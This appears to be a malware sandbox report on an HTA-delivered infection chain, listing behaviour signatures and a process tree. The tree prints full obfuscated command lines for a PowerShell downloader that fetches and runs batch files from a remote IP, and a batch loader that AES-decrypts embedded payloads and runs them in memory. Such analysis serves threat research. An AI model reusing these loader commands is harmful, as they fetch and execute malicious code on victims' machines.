Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3532 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3532 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3532 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3532 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3532 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3532 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3532 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3532 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3532 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3532 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3532 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4496 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1716 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://193.222.96.128:7287/"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://193.222.96.128:7287/

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.0.748411504\861399078" -parentBuildID 20230214051806 -prefsHandle 1804 -prefMapHandle 1796 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {27fccf99-4260-425d-99f6-3f24e5d01725} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 1884 2e29c70ea58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.1.138431360\1987171567" -parentBuildID 20230214051806 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {890110b5-bc17-4d2c-bc1c-e31324d6da70} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 2476 2e288489058 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.2.40416309\731482835" -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f8a09c5-4824-4734-ac39-70b52d034736} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 3076 2e29f63e558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.3.1814357587\895428089" -childID 2 -isForBrowser -prefsHandle 3872 -prefMapHandle 3868 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c418a55c-6c1d-41a8-bf3e-7ffa99b591ac} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 3884 2e28847ae58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.4.1950139730\442656087" -childID 3 -isForBrowser -prefsHandle 5156 -prefMapHandle 5152 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e511be1-32c8-4cc2-847d-6c9ff30d630d} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5004 2e2a296b258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.5.1027841266\366751635" -childID 4 -isForBrowser -prefsHandle 5172 -prefMapHandle 5176 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e45dafc5-ff67-410a-a601-1032514c435c} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5308 2e2a30cc758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.6.495439415\1688938685" -childID 5 -isForBrowser -prefsHandle 5568 -prefMapHandle 5564 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e1c3b01-a8c7-4a97-9079-375a14f935da} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5484 2e2a30cd058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.7.849901555\1470011006" -childID 6 -isForBrowser -prefsHandle 5244 -prefMapHandle 5208 -prefsLen 27737 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf25254b-b9f7-4fd9-a7d9-194410428f3c} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5232 2e2a4158758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.8.1396890668\1422348576" -childID 7 -isForBrowser -prefsHandle 5456 -prefMapHandle 5460 -prefsLen 27737 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {936b04b0-ee0c-4157-b1c5-4c852db4e4c6} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5932 2e29e8c3b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.9.2007607417\154283277" -childID 8 -isForBrowser -prefsHandle 4608 -prefMapHandle 3564 -prefsLen 27737 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60d765d3-345c-41aa-9b77-e00a0c6f9513} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 1540 2e29e629d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.10.131863300\526272546" -childID 9 -isForBrowser -prefsHandle 6476 -prefMapHandle 6472 -prefsLen 27816 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f0d99e0-3fc9-4558-af31-b6884fcaa9b5} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6488 2e2a4b95358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.11.1475847541\2054531302" -childID 10 -isForBrowser -prefsHandle 6736 -prefMapHandle 6732 -prefsLen 27816 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54cc6389-6d2a-4122-b527-e49c3cbbb04f} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6708 2e2a5b09058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.12.1487225003\675476188" -childID 11 -isForBrowser -prefsHandle 6968 -prefMapHandle 6964 -prefsLen 27816 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e85508ba-addf-4b88-947e-fd370e035bb2} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6976 2e2a5bbe258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.13.1180940323\1997716798" -childID 12 -isForBrowser -prefsHandle 6040 -prefMapHandle 5956 -prefsLen 28217 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ec513b2-3673-4470-b3ef-251a8ae8dcf2} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6056 2e2a5971858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.14.1840811761\1315247919" -childID 13 -isForBrowser -prefsHandle 6092 -prefMapHandle 5692 -prefsLen 28217 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {856cd291-dc3a-42b0-88b2-1e5aa830bba5} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 8148 2e2a5df8258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.15.1536033044\310627983" -childID 14 -isForBrowser -prefsHandle 6652 -prefMapHandle 6700 -prefsLen 28217 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b9b3bf0-6f97-4a4c-b559-d964be68553c} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 7724 2e2a4b94a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.16.615557995\1179932124" -childID 15 -isForBrowser -prefsHandle 7992 -prefMapHandle 6700 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b80b8ef-e7b3-4a6b-8e67-22d19d179b12} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5436 2e2a4eb4b58 tab

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\index.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Note.txt

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\15.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\15.bat"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.17.1721563505\970642768" -childID 16 -isForBrowser -prefsHandle 1288 -prefMapHandle 7468 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7c8016a-e570-4d3f-88db-dfe68a2b2196} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 4692 2e2a8e1b358 tab

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\15.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Downloads\15.bat"

C:\Windows\system32\cmd.exe

